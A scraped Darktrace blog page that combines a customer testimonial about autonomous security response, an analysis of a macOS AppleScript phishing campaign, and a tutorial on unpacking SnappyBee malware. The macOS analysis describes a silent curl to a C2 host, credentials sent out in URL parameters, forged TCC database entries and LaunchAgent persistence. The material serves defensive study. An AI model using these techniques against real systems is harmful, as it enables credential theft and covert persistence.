NJ State Bar Moves Towards Business-Wide Autonomous Security
See how the New Jersey State Bar Association adopted Darktrace’s Autonomous Response technology across and stopped a sophisticated SaaS attack. Read more.
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dr Robert Spangler
Associate Executive Director of the New Jersey State Bar Association
Share
29
Mar 2022
The New Jersey State Bar Association supports more than 18,000 attorneys, judges and legislators in the metropolitan New York City region. From an IT security perspective, our primary goals are to protect the sensitive data of our employees and members, and minimize the disruption to our business caused by cyber-threats.
Over the past few years, our team has become increasingly concerned about the terrifying pace at which the threat landscape is evolving. We’ve seen escalating ransomware attacks, we’ve seen attackers targeting the supply chain and exploiting SaaS platforms like Microsoft 365 and Salesforce. We see new vulnerabilities coming out all the time. On the email side, we see evolving attack techniques, with malicious links hidden in documents so that an email bypasses the first line of defense, or lateral movement against calendar invites.
The pace of attacker innovation tells us one thing: we can’t just protect ourselves against the threats that we know about; we must also prepare for those we don’t know about. What might sound like a paradox is actually achievable with the right approach.
This was one of the factors that drew us to Darktrace two years ago: its ability to learn what’s ‘normal’ for our organization and detect anomalies that indicate a cyber-threat. And it wasn’t long into the deployment that this started to yield strong results, shining a light on new vulnerabilities and activity we didn’t previously know about.
But the other major factor in that purchasing decision was Darktrace’s Autonomous Response capability. Cyber-attacks are no longer controlled by a human from start to finish. Attackers are adopting automation and machine learning to scale up and launch faster and more damaging campaigns.
Our relatively small IT team were in constant action trying to stay on top of some of the threats we faced. But even the best team in the world need to sleep. And we found attackers were taking advantage of this, conducting much of their activity outside of office hours, in the middle of the night or on weekends. This led us to the conclusion that we needed something that could respond autonomously, around the clock, to contain serious emerging threats.
Incorporating Autonomous Response into the security stack
The decision to let an AI make decisions and actively intervene in our environment was not taken lightly and prompted a number of considerations. Some people in our team were sceptical and thought it wouldn’t work, others feared that the AI would replace them and render their jobs redundant. Neither turned out to be the case.
One concern was that the AI would trip up our system, with false positives triggering unwanted actions and resulting in disruption. But after a short learning period and some relatively simple fine-tuning, its actions are now extremely precise, acting only in the case of a serious attack and intervening in a targeted way, blocking only unwanted connections without taking the device offline.
As for the AI making our humans redundant: this hasn’t happened either. We’ve found that the AI augments our team and works alongside them: it does much of the heavy lifting: the tedious, manual work, and it means our team can spend their time on things that matter, being proactive and staying on top of threats rather than always playing catch up.
It’s interesting how over time, Autonomous Response has naturally integrated with our workflow. Our experiences over the last two years have definitely prompted a change in philosophy, from a wariness towards AI to embracing a system where humans and AI work in tandem. We even use the product as an education tool: the information it gives us has become incredibly valuable for junior staff who are still learning how to respond to certain events. We’re at the point now where Darktrace is referred to almost as a sentient being; it has become another member of the team, responding to threats and protecting our business like everyone else.
Expanding Autonomous Response across the enterprise
Once we were confident in the AI’s decision-making and its ability to detect and respond to known and unknown threats around the clock, the next phase was to implement this technology across all parts of the digital estate.
When we moved to a system of remote working following the pandemic, it was important to us that Autonomous Response be brought to remote endpoint devices, so that it could be active in protecting our employees, wherever they were working from. We did already have detection and response in place on the endpoint, but by this point, Darktrace’s Autonomous Response had become so integral to our security posture that we needed to extend it to cover every base.
We also adopted Antigena Email, which uses the same underlying approach to respond to novel threats targeting the inbox, and Antigena SaaS, to respond to account takeovers in Microsoft 365.
Having a single AI approach span multiple silos serves to increase the accuracy of its decision-making: an understanding of endpoint and network traffic can help Antigena Email understand if a link in an email is threatening, for example. Or in the case of account takeover, an unusual SaaS login followed by suspicious email activity can paint a picture of one systematic attack.
The more sophisticated attackers today are unlikely to target just one corner of your digital estate. Having a single AI system connect the dots across cloud, email, network and endpoints puts us in the best possible position.
A crucial layer of defense
I liken the need for Darktrace with the need to wear a seatbelt. You hope that most of the time, you won’t need it. But when the worst happens, it can save you from a potentially fatal threat.
In early 2022 we were targeted by a very targeted, clever attack, in which the attacker adopted a variety of techniques to stay under the radar of the rest of our security stack. It began with a seemingly benign SaaS login from an expected region of the world, but from a different network within that region. We would not have seen this attack without Darktrace connecting multiple subtle anomalies. And we know that if there was some lateral movement later down the line then Antigena would kick in in a variety of different ways to shut the attack down.
As we continue to be targeted by increasingly advanced attackers, this is the kind of insurance we need. Darktrace is not the only tool we use, but it has become the foundation that everything is built on. And with Autonomous Response across our digital estate, we know we have best-in-class protection against novel attacks, no matter where or when they come in.
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Dr Robert Spangler
Associate Executive Director of the New Jersey State Bar Association
The State of AI Cybersecurity 2026: Unveiling insights from over 1,500 security leaders
This year, organizations have been racing to implement generative and agentic AI tools at a breakneck pace. Darktrace asked over 1,500 security leaders about how they’re navigating these rapid technology shifts – and the challenges and opportunities enterprise AI presents.
Introducing Darktrace / SECURE AI: Complete AI Security Across Your Enterprise
Darktrace introduces a new product for securing AI across the enterprise. Darktrace / SECURE AI marks the next chapter in securing organizations from cyber threats and emerging risks. By combining full visibility, intelligent behavioral oversight, and real-time control, Darktrace is enabling enterprises to safely adopt, manage, and build AI within their business.
How to Secure AI in the Enterprise: A Practical Framework for Models, Data, and Agents
AI is accelerating faster than governance can keep up, expanding attack surfaces and creating unseen risks. From data and models to AI agents and integrations, security starts by knowing what to protect. Discover how to identify AI-driven risks, so you can establish governance frameworks and controls that secure innovation without exposing the enterprise to new attack surfaces.
AppleScript Abuse: Unpacking a macOS Phishing Campaign
Introduction
Darktrace security researchers have identified a campaign targeting macOS users through a multistage malware campaign that leverages social engineering and attempted abuse of the macOS Transparency, Consent and Control (TCC) privacy feature.
The malware establishes persistence via LaunchAgents and deploys a modular Node.js loader capable of executing binaries delivered from a remote command-and-control (C2) server.
Due to increased built-in security mechanisms in macOS such as System Integrity Protection (SIP) and Gatekeeper, threat actors increasingly rely on alternative techniques, including fake software and ClickFix attacks [1] [2]. As a result, macOS threats r[NJ1] ely more heavily on social engineering instead of vulnerability exploitation to deliver payloads, a trend Darktrace has observed across the threat landscape [3].
Technical analysis
The infection chain starts with a phishing email that prompts the user to download an AppleScript file named “Confirmation_Token_Vesting.docx.scpt”, which attemps to masquerade as a legitimate Microsoft document.
Figure 1: The AppleScript header prompting execution of the script.
Once the user opens the AppleScript file, they are presented with a prompt instructing them to run the script, supposedly due to “compatibility issues”. This prompt is necessary as AppleScript requires user interaction to execute the script, preventing it from running automatically. To further conceal its intent, the malicious part of the script is buried below many empty lines, assuming a user likely will not to the end of the file where the malicious code is placed.
Figure 2: Curl request to receive the next stage.
This part of the script builds a silent curl request to “sevrrhst[.]com”, sending the user’s macOS operating system, CPU type and language. This request retrieves another script, which is saved as a hidden file at in ~/.ex.scpt, executed, and then deleted.
The retrieved payload is another AppleScript designed to steal credentials and retrieve additional payloads. It begins by loading the AppKit framework, which enables the script to create a fake dialog box prompting the user to enter their system username and password [4].
Figure 3: Fake dialog prompt for system password.
The script then validates the username and password using the command "dscl /Search -authonly <username> <password>", all while displaying a fake progress bar to the user. If validation fails, the dialog window shakes suggesting an incorrect password and prompting the user to try again. The username and password are then encoded in Base64 and sent to: https://sevrrhst[.]com/css/controller.php?req=contact&ac=<user>&qd=<pass>.
Figure 4: Requirements gathered on trusted binary.
Within the getCSReq() function, the script chooses from trusted Mac applications: Finder, Terminal, ScriptEditor, osascript, and bash. Using the codesign command codesign -d --requirements, it extracts the designated code-signing requirement from the target application. If a valid requirement cannot be retrieved, that binary is skipped. Once a designated requirement is gathered, it is then compiled into a binary trust object using the Code Signing Requirement command (csreq). This trust object is then converted into hex so it can later be injected into the TCC SQLite database.[NB2]
To bypass integrity checks, the TCC directory is renamed to com.appled.tcc using Finder. TCC is a macOS privacy framework designed to restrict application access to sensitive data, requiring users to explicitly grant permissions before apps can access items such as files, contacts, and system resources [1].
Figure 5: TCC directory renamed to com.appled.TCC.
Figure 6: Example of how users interact with TCC.
After the database directory rename is attempted, the killall command is used on the tccd daemon to force macOS to release the lock on the database. The database is then injected with the forged access records, including the service, trusted binary path, auth_value, and the forged csreq binary. The directory is renamed back to com.apple.TCC, allowing the injected entries to be read and the permissions to be accepted. This enables persistence authorization for:
Full disk access
Screen recording
Accessibility
Camera
Apple Events
Input monitoring
The malware does not grant permissions to itself; instead, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) and then executes malicious actions through these binaries to inherit their permissions.
Although the malware is attempting to manipulate TCC state via Finder, a trusted system component, Apple has introduced updates in recent macOS versions that move much of the authorization enforcement into the tccd daemon. These updates prevent unauthorized permission modifications through directory or database manipulation. As a result, the script may still succeed on some older operating systems, but it is likely to fail on newer installations, as tcc.db reloads now have more integrity checks and will fail on Mobile Device Management (MDM) [NB5] systems as their profiles override TCC.
Figure 7: Snippet of decoded Base64 response.
A request is made to the C2, which retrieves and executes a Base64-encoded script. This script retrieves additional payloads based on the system architecture and stores them inside a directory it creates named ~/.nodes. A series of requests are then made to sevrrhst[.]com for:
/controller.php?req=instd
/controller.php?req=tell
/controller.php?req=skip
These return a node archive, bundled Node.js binary, and a JavaScript payload. The JavaScript file, index.js, is a loader that profiles the system and sends the data to the C2. The script identified the system platform, whether macOS, Linux or Windows, and then gathers OS version, CPU details, memory usage, disk layout, network interfaces, and running process. This is sent to https://sevrrhst[.]com/inc/register.php?req=init as a JSON object. The victim system is then registered with the C2 and will receive a Base64-encoded response.
Figure 8: LaunchAgent patterns to be replaced with victim information.
The Base64-encoded response decodes to an additional Javacript that is used to set up persistence. The script creates a folder named com.apple.commonjs in ~/Library and copies the Node dependencies into this directory. From the C2, the files package.json and default.js are retrieved and placed into the com.apple.commonjs folder. A LaunchAgent .plist is also downloaded into the LaunchAgents directory to ensure the malware automatically starts. The .plist launches node and default.js on load, and uses output logging to log errors and outputs.
Default.js is Base64 encoded JavaScript that functions as a command loop, periodically sending logs to the C2, and checking for new payloads to execute. This gives threat actors ongoing and the ability to dynamically modify behavior without having to redeploy the malware. A further Base64-encoded JavaScript file is downloaded as addon.js.
Addon.js is used as the final payload loader, retrieving a Base64-encoded binary from https://sevrrhst[.]com/inc/register.php?req=next. The binary is decoded from Base64 and written to disk as “node_addon”, and executed silently in the background. At the time of analysis, the C2 did not return a binary, possibly because certain conditions were not met. However, this mechanism enables the delivery and execution of payloads. If the initial TCC abuse were successful, this payload could access protected resources such as Screen Capture and Camera without triggering a consent prompt, due to the previously established trust.
Conclusion
This campaign shows how a malicious threat actor can use an AppleScript loader to exploit user trust and manipulate TCC authorization mechanisms, achieving persistent access to a target network without exploiting vulnerabilities.
Although recent macOS versions include safeguards against this type of TCC abuse, users should keep their systems fully updated to ensure the most up to date protections. These findings also highlight the intentions of threat actors when developing malware, even when their implementation is imperfect.
Credit to Tara Gould (Malware Research Lead) Edited by Ryan Traill (Analyst Content Lead)
The aim of this blog is to be an educational resource, documenting how an analyst can perform malware analysis techniques such as unpacking. This blog will demonstrate the malware analysis process against well-known malware, in this case SnappyBee.
SnappyBee (also known as Deed RAT) is a modular backdoor that has been previously attributed to China-linked cyber espionage group Salt Typhoon, also known as Earth Estries [1] [2]. The malware was first publicly documented by TrendMicro in November 2024 as part of their investigation into long running campaigns targeting various industries and governments by China-linked threat groups.
In these campaigns, SnappyBee is deployed post-compromise, after the attacker has already obtained access to a customer's system, and is used to establish long-term persistence as well as deploying further malware such as Cobalt Strike and the Demodex rootkit.
To decrease the chance of detection, SnappyBee uses a custom packing routine. Packing is a common technique used by malware to obscure its true payload by hiding it and then stealthily loading and executing it at runtime. This hinders analysis and helps the malware evade detection, especially during static analysis by both human analysts and anti-malware services.
This blog is a practical guide on how an analyst can unpack and analyze SnappyBee, while also learning the necessary skills to triage other malware samples from advanced threat groups.
First principles
Packing is not a new technique, and threat actors have generally converged on a standard approach. Packed binaries typically feature two main components: the packed data and an unpacking stub, also called a loader, to unpack and run the data.
Typically, malware developers insert a large blob of unreadable data inside an executable, such as in the .rodata section. This data blob is the true payload of the malware, but it has been put through a process such as encryption, compression, or another form of manipulation to render it unreadable. Sometimes, this data blob is instead shipped in a different file, such as a .dat file, or a fake image. When this happens, the main loader has to read this using a syscall, which can be useful for analysis as syscalls can be easily identified, even in heavily obfuscated binaries.
In the main executable, malware developers will typically include an unpacking stub that takes the data blob, performs one or more operations on it, and then triggers its execution. In most samples, the decoded payload data is loaded into a newly allocated memory region, which will then be marked as executable and executed. In other cases, the decoded data is instead dropped into a new executable on disk and run, but this is less common as it increases the likelihood of detection.
Finding the unpacking routine
The first stage of analysis is uncovering the unpacking routine so it can be reverse engineered. There are several ways to approach this, but it is traditionally first triaged via static analysis on the initial stages available to the analyst.
SnappyBee consists of two components that can be analyzed:
A Dynamic-link Library (DLL) that acts as a loader, responsible for unpacking the malicious code
A data file shipped alongside the DLL, which contains the encrypted malicious code
Additionally, SnappyBee includes a legitimate signed executable that is vulnerable to DLL side-loading. This means that when the executable is run, it will inadvertently load SnappyBee’s DLL instead of the legitimate one it expects. This allows SnappyBee to appear more legitimate to antivirus solutions.
The first stage of analysis is performing static analysis of the DLL. This can be done by opening the DLL within a disassembler such as IDA Pro. Upon opening the DLL, IDA will display the DllMain function, which is the malware’s initial entry point and the first code executed when the DLL is loaded.
Figure 1: The DllMain function
First, the function checks if the variable fdwReason is set to 1, and exits if it is not. This variable is set by Windows to indicate why the DLL was loaded. According to Microsoft Developer Network (MSDN), a value of 1 corresponds to DLL_PROCESS_ATTACH, meaning “The DLL is being loaded into the virtual address space of the current process as a result of the process starting up or as a result of a call to LoadLibrary” [3]. Since SnappyBee is known to use DLL sideloading for execution, DLL_PROCESS_ATTACH is the expected value when the legitimate executable loads the malicious DLL.
SnappyBee then uses the GetModule and GetProcAddress to dynamically resolve the address of the VirtualProtect in kernel32 and StartServiceCtrlDispatcherW in advapi32. Resolving these dynamically at runtime prevents them from showing up as a static import for the module, which can help evade detection by anti-malware solutions. Different regions of memory have different permissions to control what they can be used for, with the main ones being read, write, and execute. VirtualProtect is a function that changes the permissions of a given memory region.
SnappyBee then uses VirtualProtect to set the memory region containing the code for the StartServiceCtrlDispatcherW function as writable. It then inserts a jump instruction at the start of this function, redirecting the control flow to one of the SnappyBee DLL’s other functions, and then restores the old permissions.
In practice, this means when the legitimate executable calls StartServiceCtrlDispatcherW, it will immediately hand execution back to SnappyBee. Meanwhile, the call stack now appears more legitimate to outside observers such as antimalware solutions.
The hooked-in function then reads the data file that is shipped with SnappyBee and loads it into a new memory allocation. This pattern of loading the file into memory likely means it is responsible for unpacking the next stage.
Figure 2: The start of the unpacking routine that reads in dbindex.dat.
SnappyBee then proceeds to decrypt the memory allocation and execute the code.
Figure 3: The memory decryption routine.
This section may look complex, however it is fairly straight forward. Firstly, it uses memset to zero out a stack variable, which will be used to store the decryption key. It then uses the first 16 bytes of the data file as a decryption key to initialize the context from.
SnappyBee then calls the mbed_tls_arc4_crypt function, which is a function from the mbedtls library. Documentation for this function can be found online and can be referenced to better understand what each of the arguments mean [4].
Figure 4: The documentation for mbedtls_arc4_ crypt.
Comparing the decompilation with the documentation, the arguments SnappyBee passes to the function can be decoded as:
The context derived from 16-byte key at the start of the data is passed in as the context in the first parameter
The file size minus 16 bytes (to account for the key at the start of the file) is the length of the data to be decrypted
A pointer to the file contents in memory, plus 16 bytes to skip the key, is used as the input
A pointer to a new memory allocation obtained from VirtualAlloc is used as the output
So, putting it all together, it can be concluded that SnappyBee uses the first 16 bytes as the key to decrypt the data that follows , writing the output into the allocated memory region.
SnappyBee then calls VirtualProtect to set the decrypted memory region as Read+Execute, and subsequently executes the code at the memory pointer. This is clearly where the unpacked code containing the next stage will be placed.
Unpacking the malware
Understanding how the unpacking routine works is the first step. The next step is obtaining the actual code, which cannot be achieved through static analysis alone.
There are two viable methods to retrieve the next stage. The first method is implementing the unpacking routine from scratch in a language like Python and running it against the data file.
This is straightforward in this case, as the unpacking routine in relatively simple and would not require much effort to re-implement. However, many unpacking routines are far more complex, which leads to the second method: allowing the malware to unpack itself by debugging it and then capturing the result. This is the approach many analysts take to unpacking, and the following will document this method to unpack SnappyBee.
As SnappyBee is 32-bit Windows malware, debugging can be performed using x86dbg in a Windows sandbox environment to debug SnappyBee. It is essential this sandbox is configured correctly, because any mistake during debugging could result in executing malicious code, which could have serious consequences.
Before debugging, it is necessary to disable the DYNAMIC_BASE flag on the DLL using a tool such as setdllcharacteristics. This will stop ASLR from randomizing the memory addresses each time the malware runs and ensures that it matches the addresses observed during static analysis.
The first place to set a breakpoint is DllMain, as this is the start of the malicious code and the logical place to pause before proceeding. Using IDA, the functions address can be determined; in this case, it is at offset 10002DB0. This can be used in the Goto (CTRL+G) dialog to jump to the offset and place a breakpoint. Note that the “Run to user code” button may need to be pressed if the DLL has not yet been loaded by x32dbg, as it spawns a small process to load the DLL as DLLs cannot be executed directly.
The program can then run until the breakpoint, at which point the program will pause and code recognizable from static analysis can be observed.
Figure 5: The x32dbg dissassembly listing forDllMain.
In the previous section, this function was noted as responsible for setting up a hook, and in the disassembly listing the hook address can be seen being loaded at offset 10002E1C. It is not necessary to go through the whole hooking process, because only the function that gets hooked in needs to be run. This function will not be naturally invoked as the DLL is being loaded directly rather than via sideloading as it expects. To work around this, the Extended Instruction Pointer (EIP) register can be manipulated to point to the start of the hook function instead, which will cause it to run instead of the DllMain function.
To update EIP, the CRTL+G dialog can again be used to jump to the hook function address (10002B50), and then the EIP register can be set to this address by right clicking the first instruction and selecting “Set EIP here”. This will make the hook function code run next.
Figure 6: The start of the hookedin-in function
Once in this function, there are a few addresses where breakpoints should be set in order to inspect the state of the program at critical points in the unpacking process. These are:
- 10002C93, which allocates the memory for the data file and final code
- 10002D2D, which decrypts the memory
- 10002D81, which runs the unpacked code
Setting these can be done by pressing the dot next to the instruction listing, or via the CTRL+G Goto menu.
At the first breakpoint, the call to VirtualAlloc will be executed. The function returns the memory address of the created memory region, which is stored in the EAX register. In this case, the region was allocated at address 00700000.
Figure 7: The result of the VirtualAlloc call.
It is possible to right click the address and press “Follow in dump” to pin the contents of the memory to the lower pane, which makes it easy to monitor the region as the unpacking process continues.
Figure 8: The allocated memory region shown in x32dbg’s dump.
Single-stepping through the application from this point eventually reaches the call to ReadFile, which loads the file into the memory region.
Figure 9: The allocated memory region after the file is read into it, showing high entropy data.
The program can then be allowed to run until the next breakpoint, which after single-stepping will execute the call to mbedtls_arc4_crypt to decrypt the memory. At this point, the data in the dump will have changed.
Figure 10: The same memory region after the decryption is run, showing lower entropy data.
Right-clicking in the dump and selecting "Disassembly” will disassemble the data. This yields valid shell code, indicating that the unpacking succeeded, whereas corrupt or random data would be expected if the unpacking had failed.
Figure 11: The disassembly view of the allocated memory.
Right-clicking and selecting “Follow in memory map” will show the memory allocation under the memory map view. Right-clicking this then provides an option to dump the entire memory block to file.
Figure 12: Saving the allocated memory region.
This dump can then be opened in IDA, enabling further static analysis of the shellcode. Reviewing the shellcode, it becomes clear that it performs another layer of unpacking.
As the debugger is already running, the sample can be allowed to execute up to the final breakpoint that was set on the call to the unpacked shellcode. Stepping into this call will then allow debugging of the new shellcode.
The simplest way to proceed is to single-step through the code, pausing on each call instruction to consider its purpose. Eventually, a call instruction that points to one of the memory regions that were assigned will be reached, which will contain the next layer of unpacked code. Using the same disassembly technique as before, it can be confirmed that this is more unpacked shellcode.
Figure 13: The unpacked shellcode’s call to RDI, which points to more unpacked shellcode. Note this screenshot depicts the 64-bit variant of SnappyBee instead of 32-bit, however the theory is the same.
Once again, this can be dumped out and analyzed further in IDA. In this case, it is the final payload used by the SnappyBee malware.
Conclusion
Unpacking remains one of the most common anti-analysis techniques and is a feature of most sophisticated malware from threat groups. This technique of in-memory decryption reduces the forensic “surface area” of the malware, helping it to evade detection from anti-malware solutions. This blog walks through one such example and provides practical knowledge on how to unpack malware for deeper analysis.
In addition, this blog has detailed several other techniques used by threat actors to evade analysis, such as DLL sideloading to execute code without arising suspicion, dynamic API resolving to bypass static heuristics, and multiple nested stages to make analysis challenging.
Malware such as SnappyBee demonstrates a continued shift towards highly modular and low-friction malware toolkits that can be reused across many intrusions and campaigns. It remains vital for security teams to maintain the ability to combat the techniques seen in these toolkits when responding to infections.
While the technical details of these techniques are primarily important to analysts, the outcomes of this work directly affect how a Security Operations Centre (SOC) operates at scale. Without the technical capability to reliably unpack and observe these samples, organizations are forced to respond without the full picture.
The techniques demonstrated here help close that gap. This enables security teams to reduce dwell time by understanding the exact mechanisms of a sample earlier, improve detection quality with behavior-based indicators rather than relying on hash-based detections, and increase confidence in response decisions when determining impact.
Credit to Nathaniel Bill (Malware Research Engineer) Edited by Ryan Traill (Analyst Content Lead)
.jpg)
